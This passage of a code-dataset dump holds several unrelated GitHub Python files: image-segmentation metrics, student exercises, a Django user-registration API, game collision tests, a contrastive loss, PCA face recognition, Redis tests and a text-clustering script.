dtype=tf.float32, shape=test_data.shape)\n test = tf.constant(test_data, dtype=tf.float32, shape=test_data.shape)\n sess = tf.InteractiveSession()\n\n verify = tf.cast(tf.equal(tf.argmax(predict, axis=1), tf.argmax(test, axis=1)), dtype=tf.float32)\n accuracy = tf.reduce_mean(verify)\n\n b_p = tf.reduce_sum(tf.cast(tf.equal(tf.argmax(predict, axis=1), 3), dtype=tf.float32))\n b_t = tf.reduce_sum(tf.cast(tf.equal(tf.argmax(test, axis=1), 3), dtype=tf.float32))\n\n a_p = tf.reduce_sum(tf.cast(tf.equal(tf.argmax(predict, axis=1), 0), dtype=tf.float32))\n a_t = tf.reduce_sum(tf.cast(tf.equal(tf.argmax(test, axis=1), 0), dtype=tf.float32))\n\n o_p = tf.reduce_sum(tf.cast(tf.equal(tf.argmax(predict, axis=1), 1), dtype=tf.float32))\n o_t = tf.reduce_sum(tf.cast(tf.equal(tf.argmax(test, axis=1), 1), dtype=tf.float32))\n\n v_p = tf.reduce_sum(tf.cast(tf.equal(tf.argmax(predict, axis=1), 2), dtype=tf.float32))\n v_t = tf.reduce_sum(tf.cast(tf.equal(tf.argmax(test, axis=1), 2), dtype=tf.float32))\n \n print(\"Accuracy of Background is {}\".format(sess.run(1 - abs(b_t-b_p)/b_t)))\n print(\"Accuracy of Arteries is {}\".format(sess.run(1 - abs(a_t - a_p) / a_t)))\n print(\"Accuracy of Veins is {}\".format(sess.run(1 - abs(v_t - v_p) / v_t)))\n print(\"Accuracy of Overlap is {}\".format(sess.run(1 - abs(o_t - o_p) / o_t)))\n print(\"Overall accuracy is {}\".format(sess.run(accuracy)))\n\n\ndef np_f1score(predict_data, test_data):\n print(len(predict_data))\n predict = np.argmax(predict_data, axis=1).reshape(len(predict_data) * 565 * 565)\n test = np.argmax(test_data, axis=1).reshape(len(predict_data) * 565 * 565)\n f1_s = f1_score(test, predict, average=None)\n f1_s_w = f1_score(test, predict, average='weighted')\n precision_s = precision_score(test, predict, average=None)\n precision_s_w = precision_score(test, predict, average='weighted')\n recall_s = recall_score(test, predict, average=None)\n recall_s_w = recall_score(test, predict, average='weighted')\n print(\"Precision of A,O,V,B is {}\".format(precision_s))\n print(\"Overall Precision is {}\".format(precision_s_w))\n print(\"Recall of A,O,V,B is {}\".format(recall_s))\n print(\"Overall Recall is {}\".format(recall_s_w))\n print(\"F1-Score of A,O,V,B {}\".format(f1_s))\n print(\"Overall F-1 Score is {}\".format(f1_s_w))\n\n\ndef plot_confusion_matrix(predict_data, test_data):\n predict = np.argmax(predict_data, axis=1).reshape(len(predict_data) * 565 * 565)\n test = np.argmax(test_data, axis=1).reshape(len(predict_data) * 565 * 565)\n conf_matrix = confusion_matrix(test, 
predict)\n print(\"Confusion matrix is {}\".format(conf_matrix))\n plt.imshow(conf_matrix, interpolation='bessel', cmap=plt.cm.Blues)\n plt.title(\"Confusion matrix\")\n plt.colorbar()\n tick_marks = np.arange(4)\n plt.xticks(tick_marks, ['arteries', 'overlap', 'veins', 'background'], rotation=45)\n plt.yticks(tick_marks, ['arteries', 'overlap', 'veins', 'background'])\n\n thresh = conf_matrix.max() / 4.\n for i, j in itertools.product(range(conf_matrix.shape[0]), range(conf_matrix.shape[1])):\n plt.text(j, i, conf_matrix[i, j], horizontalalignment=\"center\",\n color=\"white\" if conf_matrix[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.savefig(\"data/document_images/confusion_matrix.png\")\n\n\ndef plot_precision_recall(predict_data, test_data):\n precision = dict()\n recall = dict()\n average_precision = dict()\n print(test_data.shape)\n for i in range(4):\n precision[i], recall[i], _ = precision_recall_curve(test_data[i, ...],\n predict_data[i, ...])\n average_precision[i] = average_precision_score(test_data[i, ...], predict_data[i, ...])\n\nif __name__ == \"__main__\":\n # predict_data = np.load('cache/test_predict2_class_4_relu.npy')\n predict_data = np.load('cache/test_predict2_class_4_dev2_relu.npy')\n # predict_data = np.load ('cache/test_predict2_class_4_soft_relu.npy')\n test_data = prepare_image.load_images(data_type=\"test\", image_type=\"label\", classification=4,\n dataset=\"small\")\n tf_accuracy(predict_data=predict_data, test_data= test_data)\n np_f1score(predict_data=predict_data, test_data= test_data)\n plot_confusion_matrix(predict_data=predict_data, test_data= test_data)\n \"\"\"\n # plot_precision_recall(predict_data=predict_data, test_data= test_data)\n print(test_data.shape)\n predict = np.argmax(predict_data, axis=1).reshape(len(predict_data) * 565 * 565)\n test = np.argmax(test_data, axis=1).reshape(len(predict_data) * 565 * 565)\n print(sklearn.metrics.roc_curve(test,predict,pos_label=4))\n print(sklearn.metrics.precision_recall_curve(test, predict, pos_label=4))\n \"\"\"\n\n\n\n","repo_name":"neeru0303/Retinal-Segmentation","sub_path":"python/generate_metrics.py","file_name":"generate_metrics.py","file_ext":"py","file_size_in_byte":5515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9439267349","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 25 02:10:11 2022\n\n@author: Prashanth C S\n\"\"\"\n\ntotal_cost = 1000000\n\npercent_down_payment = 0.25\nportion_down_payment = percent_down_payment * total_cost\nannual_return_rate = 0.04\nannual_salary = 150000\nmonthly_salary = annual_salary/12\n#portion_saved = int(input('Enter the percent of your salary to save: '))/100\n#portion_saved_monthly = portion_saved * monthly_salary\n\n\nannual_raise = 0.07\n#enter_the_months = int(input(\"Enter the months you want to save for: \"))\nacceptable_difference = 100\n\n\n\ndef getTotalSavings(monthly_saving_rate, monthly_salary, annual_salary):\n monthly_saving_rate = monthly_saving_rate / 10000\n #print(\"monthly_saving_rate\",monthly_saving_rate)\n \n current_savings = 0\n interest_accrued = 0\n #print(\"monthly_salary\",monthly_salary)\n #print(\"annual_salary\",annual_salary)\n portion_saved_monthly = monthly_saving_rate * monthly_salary\n #print(\"portion_saved_monthly\",portion_saved_monthly)\n for i in range(1,37):\n monthly_interest = (current_savings*annual_return_rate)/12\n interest_accrued += monthly_interest\n 
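\n        # comment added (not in the original): grow the balance by this month's deposit plus the interest accrued above\n        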
current_savings += portion_saved_monthly + monthly_interest\n        if(i % 6 == 0):\n            annual_salary += annual_salary * annual_raise\n            monthly_salary = annual_salary/12\n            portion_saved_monthly = monthly_saving_rate * monthly_salary\n    return round(current_savings)\n\ncount = 0\n\ndef getPercent(low, high):\n    global count\n    count += 1\n    \n    mid = (high + low) / 2\n    #print(\"count:\",count,\"low, high, mid is \",low, high, mid)\n    down_payment = round(portion_down_payment)\n    savings = getTotalSavings(mid, monthly_salary, annual_salary)\n    #print(\"savings: \",savings)\n    # difference = savings - down_payment\n    if count >= 12:\n        return mid\n    if( savings in range(down_payment-100, down_payment+100)):\n        return mid\n    if(savings < down_payment):\n        return getPercent(mid, high)\n    return getPercent(low, mid)\n\n\n\nprint(getPercent(0,10000)/10000)","repo_name":"prashanth4474/MIT_6_0001","sub_path":"ps1/ps1ctest.py","file_name":"ps1ctest.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"28308498373","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# x0 is assumed to be a row vector (an initial probability distribution)\ndef prob_xt(matrix, x0, t):\n    power = np.linalg.matrix_power(matrix, t)\n    return np.dot(x0, power)\n\n\n\ndef showgraph(matrix, dists):\n    pxts = [[] for _ in range(len(dists))]\n    for i in range(len(dists)):\n        for j in range(0, 30):\n            pxts[i].append(prob_xt(matrix, dists[i], j))\n\n    fig, axes = plt.subplots(3)\n    for i in range(len(dists)):\n        axes[i].set(xlabel='Time t', ylabel='P(Xt)', ylim=(0.,1.))\n        axes[i].set_title(f'Distribution #{i+1}')\n        axes[i].label_outer()\n        for j in range(len(matrix)):\n            axes[i].plot([pxt[j] for pxt in pxts[i]], label = f'State #{j+1}')\n\n    plt.subplots_adjust(hspace=0.3)\n    plt.legend(loc='center left', bbox_to_anchor=(1, 1))\n    plt.tight_layout()\n    plt.show()\n\ntrans_mat1 = np.array([[0, 1/2, 1/2],[1/3, 1/3, 1/3],[1/2, 1/2, 0]])\ntrans_mat2 = np.array([[1/3, 1/2, 1/6],[1/3, 1/3, 1/3],[0, 0, 1]])\ntrans_mat3 = np.array([[0, 0, 1, 0],[0, 0, 1, 0],[1, 0, 0, 0],[1/2, 1/2, 0, 0]])\n\nmat1_st_x0 = np.array([1/3, 1/3, 1/3]) \nmat1_nd_x0 = np.array([1/6, 1/2, 1/3])\nmat1_rd_x0 = np.array([1/10, 5/10, 2/5])\n\n\nmat2_st_x0 = np.array([1/4, 1/2, 1/4]) \nmat2_nd_x0 = np.array([0, 1, 0])\nmat2_rd_x0 = np.array([1/10, 9/10, 0])\n\nmat3_st_x0 = np.array([1/4, 1/4, 1/4, 1/4]) \nmat3_nd_x0 = np.array([0, 0, 0, 1])\nmat3_rd_x0 = np.array([1/3, 1/2, 0, 1/6])\n\nshowgraph(trans_mat1, [mat1_st_x0, mat1_nd_x0, mat1_rd_x0])\nshowgraph(trans_mat2, [mat2_st_x0, mat2_nd_x0, mat2_rd_x0])\nshowgraph(trans_mat3, [mat3_st_x0, mat3_nd_x0, mat3_rd_x0])\n# pick any 3 starting distributions, one of which is uniform (all the same)\n# compute prob_xt from 0 to 100\n# plot as a function of time (one plot for the 3 states)","repo_name":"blacksages/processus-stochastiques","sub_path":"chaine1.3.py","file_name":"chaine1.3.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"35333218260","text":"seat_assignment = ' 24A '\ngate_announcement = 'Boarding for flight UA 123 has begun.'\nseat_assignment = '24a'\ngate_number = 'B12'\ncities = ['New York', 'Los Angeles', 
'Chicago']\n\n# Enter your solution here\nclean_seat_assignment = seat_assignment.strip()\nupdated_announcement = gate_announcement.replace(\"Departing\", \"Boarding\")\nuppercase_seat = seat_assignment.upper()\ngate = gate_number[1:]\nterminal = gate_number[:1]\ncities_string = \",\".join(cities)\n\nprint(clean_seat_assignment)\nprint(updated_announcement)\nprint(uppercase_seat)\nprint(terminal)\nprint(gate)\nprint(cities_string)","repo_name":"eccololo/pkrakowiak-udemy-course","sub_path":"course-2-exercises/68_exercise.py","file_name":"68_exercise.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41786848286","text":"from django.shortcuts import render\nfrom rest_framework.generics import GenericAPIView\nfrom api.userprofile.serializers import RegistrationSerializer, UserSerializer\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\n\n# Verification email\nfrom django.template.loader import render_to_string\nfrom django.utils.http import urlsafe_base64_encode\nfrom django.utils.encoding import force_bytes\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.contrib.auth.tokens import default_token_generator\nfrom django.core.mail import EmailMessage\n\nfrom rest_framework.views import APIView\nfrom rest_framework.permissions import IsAuthenticated, IsAdminUser, BasePermission, SAFE_METHODS\n\nfrom rest_framework.permissions import DjangoObjectPermissions\n\nfrom django.http import Http404\n\nfrom userprofile.models import Profile\nfrom rest_framework import permissions\n\nclass RegistrationAPIView(GenericAPIView):\n serializer_class = RegistrationSerializer\n\n def post(self, request):\n serializer = RegistrationSerializer(data=request.data)\n if serializer.is_valid():\n user = serializer.save() \n profile = Profile(user=user)\n profile.save()\n\n # USER ACTIVATION\n current_site = '127.0.0.1:8000'\n mail_subject = 'Please activate your account'\n message = render_to_string('api/account_verification_email.html', {\n 'user': user,\n 'domain': current_site,\n 'uid': urlsafe_base64_encode(force_bytes(user.pk)),\n 'token': default_token_generator.make_token(user),\n })\n\n to_email = serializer.data['email']\n send_email = EmailMessage(mail_subject, message, to=[to_email])\n #send_email.send() \n\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\ndef Activate(request, uidb64, token):\n try:\n uid = urlsafe_base64_decode(uidb64).decode()\n user = User._default_manager.get(pk=uid)\n except(TypeError, ValueError, OverflowError, User.DoesNotExist):\n user = None\n\n if user is not None and default_token_generator.check_token(user, token):\n user.is_active = True\n user.save()\n messages.success(request, 'Congratulations! 
Your account is activated.')\n return redirect('/accounts/login/') #TODO\n else:\n messages.error(request, 'Invalid activation link')\n return redirect('/accounts/login/') #TODO \n\n\nclass CustomUserPermission(permissions.BasePermission):\n\n def is_group_allow(self, theperm):\n # Return True if user in Groups\n for group in theperm:\n if group in ['supervisor', 'manager']:\n return True\n \n return False\n\n def has_permission(self, request, view):\n \n custom_perms = request.user.groups.values_list('name',flat=True) \n perm_groups = list(custom_perms) \n \n is_GroupAllow = self.is_group_allow(perm_groups) #Check with group (Has 3 Groups [manager, supervisor, staff], see an images)\n if not is_GroupAllow:\n return request.user == User.objects.get(pk=view.kwargs['pk'])\n\n #return request.user.has_perm('userprofile.change_profile') #Check with has_perm('foo.change_bar')\nclass UpdateFirstLast_Name(APIView): \n \n \"\"\"\n Update first_name, last_name\n \"\"\"\n permission_classes = (CustomUserPermission,)\n\n def get_object(self, pk):\n try:\n return User._default_manager.get(pk=pk)\n except User.DoesNotExist:\n raise Http404 \n \n def patch(self, request, pk, format=None): \n user = self.get_object(pk)\n serializer = UserSerializer(user, data=request.data, partial=True)\n\n chkfields = list()\n fieldslist = list(serializer.fields)\n for k, v in request.data.items():\n if k not in fieldslist:\n chkfields.append(k) \n\n if ((serializer.is_valid()) and (len(chkfields) == 0)):\n serializer.save()\n return Response(serializer.data)\n\n if len(chkfields) > 0:\n err_str = {\"detail: Field(s) incorrect !\": chkfields}\n return Response(err_str, status=status.HTTP_400_BAD_REQUEST)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST) ","repo_name":"samrids/django_permission","sub_path":"api/userprofile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"73992569400","text":"import pytest\n\nfrom envs.breakout import (\n BreakoutCollisionEvent,\n BreakoutEnv,\n CollisionPlatformWall,\n)\nfrom tests.math_utils import almost_equal_float\n\n\n@pytest.mark.breakout\n@pytest.mark.collisions\n@pytest.mark.platform\n@pytest.mark.wall\nclass TestCollisionsPlatformWall:\n def test_platform_left_wall_collision_type(\n self,\n breakout: BreakoutEnv,\n platform_left_wall_collision_level,\n ):\n level, action, ticks = platform_left_wall_collision_level\n breakout.import_state(level)\n\n breakout.step(\n action=action,\n dt=ticks,\n )\n\n events = breakout.pop_events()\n assert len(events) == 1\n event = events[0]\n assert isinstance(event, BreakoutCollisionEvent)\n assert isinstance(event.collision, CollisionPlatformWall)\n assert almost_equal_float(\n event.collision.platform.rect.left, breakout.rect.left, eps=1e-3\n )\n\n def test_platform_right_wall_collision_type(\n self,\n breakout: BreakoutEnv,\n platform_right_wall_collision_level,\n ):\n level, action, ticks = platform_right_wall_collision_level\n breakout.import_state(level)\n\n breakout.step(\n action=action,\n dt=ticks,\n )\n\n events = breakout.pop_events()\n assert len(events) == 1\n event = events[0]\n assert isinstance(event, BreakoutCollisionEvent)\n assert isinstance(event.collision, CollisionPlatformWall)\n assert almost_equal_float(\n event.collision.platform.rect.right, breakout.rect.right, eps=1e-3\n 
)\n","repo_name":"hatterton/agym","sub_path":"src/tests/integration/breakout_collisions/test_platform_wall.py","file_name":"test_platform_wall.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"16885015255","text":"from turtle import forward\nimport torch\nimport torch.nn.functional as F\n\nclass ContrastiveLoss(torch.nn.Module):\n def __init__(self, T=0.5):\n super().__init__()\n self.T = T\n def forward(self, x, y):\n representations = x\n label = y\n T = self.T\n n = label.shape[0] # batch\n #这步得到它的相似度矩阵\n similarity_matrix = F.cosine_similarity(representations.unsqueeze(1), representations.unsqueeze(0), dim=2)\n similarity_matrix = similarity_matrix.cuda()\n #这步得到它的label矩阵,相同label的位置为1\n mask = torch.ones_like(similarity_matrix) * (label.expand(n, n).eq(label.expand(n, n).t()))\n mask = mask.cuda()\n\n #这步得到它的不同类的矩阵,不同类的位置为1\n mask_no_sim = torch.ones_like(mask) - mask\n\n #这步产生一个对角线全为0的,其他位置为1的矩阵\n mask_dui_jiao_0 = torch.ones(n ,n) - torch.eye(n, n )\n mask_dui_jiao_0 = mask_dui_jiao_0.cuda()\n\n #这步给相似度矩阵求exp,并且除以温度参数T\n similarity_matrix = torch.exp(similarity_matrix/T)\n\n #这步将相似度矩阵的对角线上的值全置0,因为对比损失不需要自己与自己的相似度\n similarity_matrix = similarity_matrix*mask_dui_jiao_0\n\n\n #这步产生了相同类别的相似度矩阵,标签相同的位置保存它们的相似度,其他位置都是0,对角线上也为0\n sim = mask*similarity_matrix\n\n\n #用原先的对角线为0的相似度矩阵减去相同类别的相似度矩阵就是不同类别的相似度矩阵\n no_sim = similarity_matrix - sim\n\n\n #把不同类别的相似度矩阵按行求和,得到的是对比损失的分母(还一个与分子相同的那个相似度,后面会加上)\n no_sim_sum = torch.sum(no_sim , dim=1)\n\n '''\n 将上面的矩阵扩展一下,再转置,加到sim(也就是相同标签的矩阵上),然后再把sim矩阵与sim_num矩阵做除法。\n 至于为什么这么做,就是因为对比损失的分母存在一个同类别的相似度,就是分子的数据。做了除法之后,就能得到\n 每个标签相同的相似度与它不同标签的相似度的值,它们在一个矩阵(loss矩阵)中。\n '''\n no_sim_sum_expend = no_sim_sum.repeat(n, 1).T\n sim_sum = sim + no_sim_sum_expend\n loss = torch.div(sim , sim_sum)\n\n\n '''\n 由于loss矩阵中,存在0数值,那么在求-log的时候会出错。这时候,我们就将loss矩阵里面为0的地方\n 全部加上1,然后再去求loss矩阵的值,那么-log1 = 0 ,就是我们想要的。\n '''\n #loss = torch.sum(mask_no_sim, loss, torch.eye(n, n ))\n loss = mask_no_sim + loss + (torch.eye(n, n )).cuda()\n\n\n #接下来就是算一个批次中的loss了\n loss = -torch.log(loss) #求-log\n loss = torch.sum(torch.sum(loss, dim=1) )/(2*n) #将所有数据都加起来除以2n\n\n return loss\n\n#loss_func = ContrastiveLoss()\n\n\n","repo_name":"ZyGan1999/ContrastiveLearningWithTransformer","sub_path":"model/contrastive.py","file_name":"contrastive.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14929952779","text":"import os\nimport sys\nimport glob\nimport cv2\nimport numpy as np\n\n# 폴더와 파일 생성해서 결과 작성\nSTUDENT_CODE = '2017147505'\nFILE_NAME = 'output.txt'\nif not os.path.exists(STUDENT_CODE):\n os.mkdir(STUDENT_CODE)\nf = open(os.path.join(STUDENT_CODE, FILE_NAME), 'w')\n\n# 우선 이미지를 전부 읽어와서 vectorize한 다음 하나로 합친다.\n# (39, 192 * 168)\ntrain_images = []\n\nimage = cv2.imread(\"faces_training/face01.pgm\", cv2.IMREAD_GRAYSCALE)\ntrain_images.append(image)\n\nlength, height = image.shape\nimage = image.reshape((length * height * 1, 1))\n\nfor i in range(2, 10):\n x = cv2.imread(f\"faces_training/face0{i}.pgm\", cv2.IMREAD_GRAYSCALE)\n train_images.append(x)\n temp = x.reshape((length * height * 1, 1))\n image = np.concatenate([image, temp], axis=1)\n\nfor i in range(10, 40):\n x = cv2.imread(f\"faces_training/face{i}.pgm\", cv2.IMREAD_GRAYSCALE)\n train_images.append(x)\n temp = x.reshape((length * height * 1, 1))\n image = np.concatenate([image, temp], axis=1)\n\ntrain_all_image = image\n\n\ndef 
\ndef computeDimensions(img, percent=0.95):\n    \"\"\"\n    Takes the full image matrix and a percentage, and returns the reconstructed\n    images together with the number of selected dimensions.\n    \"\"\"\n    # computing eigenvalues and eigenvectors of covariance matrix\n    img_mean = np.mean(img.T, axis=1)\n    img = (img - img_mean)\n\n    U, Sv, Vt = np.linalg.svd(img, full_matrices=False)\n\n    # Sv is the list of singular values (squared below they give the eigenvalues)\n    Sv = sorted(Sv)\n    Sv = Sv[::-1]  # reorder so the largest value comes first\n    eigvals = [x**2 for x in Sv]\n\n    sum_of = 0\n    numPc = 0\n    sum_all = sum(eigvals)\n\n    for e in eigvals:\n        sum_of += e\n        numPc += 1\n        if(sum_of/sum_all >= percent):\n            break\n\n    U = U[:, :numPc]  # keep only the selected number of principal components\n    Sv = np.diag(Sv[:numPc])\n    Vt = Vt[:numPc, :]\n    reconstruct = np.dot(U, np.dot(Sv, Vt)) + img_mean\n\n    return reconstruct, numPc, U\n\n\n# target percentage to reach\nperc = float(sys.argv[1])\n\n# run the extraction with that value\nreconstruct, numPc, truncU = computeDimensions(train_all_image, perc)\n\n\nf.write(\"######### STEP 1 #########\\n\")\nf.write(f\"Input Percentage: {perc}\\n\")\nf.write(f\"Selected Dimension : {numPc}\\n\")\n\n\nf.write(\"\\n######### STEP 2 #########\\n\")\nf.write(\"Reconstruction error\\n\")\n\n# list holding the reconstruction errors\nre_error = []\n\n# list holding the reconstructed images\nre_imgs = []\n\nfor n in range(39):\n    re_err_sum = 0\n    # take each column vector and reshape it back into an image\n    re_img = reconstruct[:, n].reshape(length, height)\n    for i in range(length):\n        for j in range(height):\n            re_err_sum += np.abs(train_images[n][i][j] - re_img[i][j])**2\n    # divide the total error by the number of pixels\n    re_error.append(re_err_sum/(length*height))\n    re_imgs.append(re_img)\n\n# write the errors and save the images\nf.write(f\"average : {round(sum(re_error)/len(re_error),4)}\\n\")\nfor n in range(1, 10):\n    f.write(f\"0{n}: {round(re_error[n-1],4)}\\n\")\n    cv2.imwrite(f\"{STUDENT_CODE}/face0{n}.png\", re_imgs[n-1])\n\nfor n in range(10, 40):\n    f.write(f\"{n}: {round(re_error[n-1],4)}\\n\")\n    cv2.imwrite(f\"{STUDENT_CODE}/face{n}.png\", re_imgs[n-1])\n\n\nf.write(\"\\n######### STEP 3 ##########\")\n\ntest_images = []\n# vectorize the test images into one matrix as well\ntest_all_imgs = cv2.imread(\"faces_test/test01.pgm\", cv2.IMREAD_GRAYSCALE)\ntest_images.append(test_all_imgs)\n\nimg_size = test_all_imgs.shape\ntest_all_imgs = test_all_imgs.reshape((length * height * 1, 1))\n\nfor i in range(2, 6):\n    x = cv2.imread(f\"faces_test/test0{i}.pgm\", cv2.IMREAD_GRAYSCALE)\n    test_images.append(x)\n    temp = x.reshape((length * height * 1, 1))\n    test_all_imgs = np.concatenate([test_all_imgs, temp], axis=1)\n\n# project the reconstructed images and the test images onto the\n# truncated U matrix extracted and saved in Step 1\nface_proj = truncU.T @ reconstruct\ntest_proj = truncU.T @ test_all_imgs\n\n\ndef similarity_between_faces(face_t, face2_r):\n    \"\"\"\n    Takes two image numbers and returns the Euclidean distance between them.\n    \"\"\"\n    face_t -= 1\n    face2_r -= 1\n\n    face_diff = test_proj[:, face_t] - face_proj[:, face2_r]\n\n    return np.linalg.norm(face_diff)\n\n\ndef find_most_similar(face):\n    \"\"\"\n    Takes a test image number and returns the number of the most similar training image.\n    \"\"\"\n    distances = []\n    for face_n in range(1, 40):  # training faces are numbered 1..39 (fixes an off-by-one)\n        sim = similarity_between_faces(face, face_n)\n        distances.append(sim)\n\n    best_score = min(distances)  # lowest score = shortest distance = most similar image\n    best_face_num = distances.index(best_score) + 1  # back to 1-based numbering\n\n    return best_face_num\n\n\nfor a in range(1, 6):\n    found = find_most_similar(a)\n\n    if found >= 10:\n        f.write(f\"\\ntest0{a}.pgm ==> face{found}.pgm\")\n    else:\n        f.write(f\"\\ntest0{a}.pgm ==> 
face0{found}.pgm\")\n\nf.close()\n","repo_name":"thxxx/computerVision","sub_path":"Project2/2017147505.py","file_name":"2017147505.py","file_ext":"py","file_size_in_byte":5047,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28155023111","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport unittest\nimport json\n\nfrom redis import StrictRedis\n\nfrom mining.db import DataWarehouse\n\n\nclass connecion_via_drive_test(unittest.TestCase):\n def test_connection(self):\n DW = DataWarehouse()\n self.assertTrue(isinstance(DW.conn(), StrictRedis))\n\n\nclass save_via_drive_test(unittest.TestCase):\n def test_save_application_json(self):\n DW = DataWarehouse()\n DW.save('test_1', {\"id\": 1, \"name\": \"Open Mining\"})\n r = StrictRedis()\n self.assertEquals(r.get('test_1'), '{\"id\": 1, \"name\": \"Open Mining\"}')\n\n def test_save_text(self):\n DW = DataWarehouse()\n DW.save('test_2', \"Open Mining\", content_type='application/text')\n r = StrictRedis()\n self.assertEquals(r.get('test_2'), \"Open Mining\")\n\n\nclass get_via_drive_test(unittest.TestCase):\n def test_get_application_json(self):\n r = StrictRedis()\n data = {\"id\": 1, \"name\": \"Open Mining\"}\n r.set('test_get_1', json.dumps(data))\n DW = DataWarehouse()\n self.assertEquals(DW.get(\"test_get_1\"), data)\n\n def test_get_text(self):\n r = StrictRedis()\n r.set('test_get_2', \"Open Mining\")\n DW = DataWarehouse()\n self.assertEquals(\n DW.get(\"test_get_2\", content_type='application/text'),\n \"Open Mining\")\n","repo_name":"mining/mining","sub_path":"mining/test/test_db_redis_datawarehouse.py","file_name":"test_db_redis_datawarehouse.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":1200,"dataset":"github-code","pt":"40"} +{"seq_id":"9908742290","text":"\"\"\"\r\nAssignment 6 - Question 2\r\nProgram to perform baisic vector calculation in 3 dimensions\r\nJayan Smart\r\nApril 2014\r\n\"\"\"\r\n\r\nfrom math import sqrt\r\n\r\ndef vec_add(vec_A, vec_B):#Compute Addition:\r\n x_sum = vec_A[0] + vec_B[0]\r\n y_sum = vec_A[1] + vec_B[1]\r\n z_sum = vec_A[2] + vec_B[2] \r\n vec_AplusB = [x_sum, y_sum, z_sum]\r\n\r\n print(\"A+B =\", vec_AplusB)\r\n\r\ndef vec_dot(vec_A, vec_B):#Compute Dot-Product:\r\n x_dot = vec_A[0] * vec_B[0]\r\n y_dot = vec_A[1] * vec_B[1]\r\n z_dot = vec_A[2] * vec_B[2] \r\n vec_AdotB = (x_dot + y_dot + z_dot)\r\n\r\n print(\"A.B =\", vec_AdotB)\r\n\r\ndef norm_A(vec_A): #Compute Norm A:\r\n norm_A = sqrt((vec_A[0])**2 + (vec_A[1])**2 + (vec_A[2])**2)\r\n\r\n print (\"|A| =\", \"{:.2f}\".format(norm_A)) \r\n\r\ndef norm_B(vec_B):#Compute Norm B:\r\n norm_B = sqrt((vec_B[0])**2 + (vec_B[1])**2 + (vec_B[2])**2)\r\n\r\n print (\"|B| =\", \"{:.2f}\".format(norm_B))\r\n\r\n \r\ndef main():\r\n #Recieve imput of vectors A and B:\r\n vec_A = input(\"Enter vector A:\\n\")\r\n vec_A = vec_A.split()\r\n for i in range(len(vec_A)):\r\n vec_A[i] = eval(vec_A[i])\r\n\r\n vec_B = input(\"Enter vector B:\\n\")\r\n vec_B = vec_B.split()\r\n for i in range(len(vec_B)):\r\n vec_B[i] = eval(vec_B[i])\r\n\r\n vec_add(vec_A, vec_B) #Compute Addition:\r\n vec_dot(vec_A, vec_B) #Compute Dot-Product:\r\n norm_A(vec_A) #Compute Norm A:\r\n norm_B(vec_B) #Compute Norm 
B:\r\n\r\nmain()\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/smrjay001/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14182584767","text":"import pandas as pd\npd.options.display.max_columns = 999\nfrom sklearn.preprocessing import MinMaxScaler\nimport numpy as np\nfrom sklearn.cluster import KMeans\nimport matplotlib.pyplot as plt\n\ndef Count_prop(data):\n\n \"\"\"\n Works out proportion word appears based on total # of words in document\n \"\"\"\n\n # sum counts by doc index\n doc_counts = pd.DataFrame(data[\"count\"].groupby(data.doc_index).sum()).reset_index()\n data = pd.merge(data, doc_counts, how= \"left\", on=['doc_index'])\n data[\"count_prop\"] = data.count_x/data.count_y\n data = data.drop(['count_y'], axis=1)\n\n return data\n\ndef MinMax(data):\n\n \"\"\"\n Scales TFIDF so Criteria can be applied to select final keywords\n \"\"\"\n\n # Remove nulls & Shape Data\n data = data.fillna(0)\n tfidf = np.array(data[\"tfidf\"])\n tfidf = tfidf.reshape(-1,1)\n\n # Run scaler\n scaler = MinMaxScaler()\n tfidf = scaler.fit_transform(tfidf)\n data[\"scaled_tfidf\"] = tfidf\n\n return data\n\n\ndef cluster(cluster_type, n_clusters, sentence_embeddings, key_phrase = None, create_plot = 'Y'):\n\n if key_phrase == None:\n key_phrase = list(range(0,len(sentence_embeddings),1))\n\n # Run KMeans\n if cluster_type == 0:\n # CREATE CLUSTERS\n kmeans = KMeans(n_clusters= n_clusters)\n # fit kmeans object to data\n kmeans.fit(sentence_embeddings)\n # print location of clusters learned by kmeans object\n # print(kmeans.cluster_centers_)\n # save new clusters for chart\n y_km = kmeans.fit_predict(sentence_embeddings)\n\n # Run Hierarchical Clustering\n if cluster_type == 1:\n from sklearn.cluster import AgglomerativeClustering\n cluster = AgglomerativeClustering(n_clusters=n_clusters, affinity='euclidean', linkage='ward')\n y_km = cluster.fit_predict(sentence_embeddings)\n\n se_array = np.array(sentence_embeddings)\n\n # CREATE PLOT\n fulldf=pd.DataFrame()\n for i in range(0, n_clusters):\n # print(i)\n if create_plot == 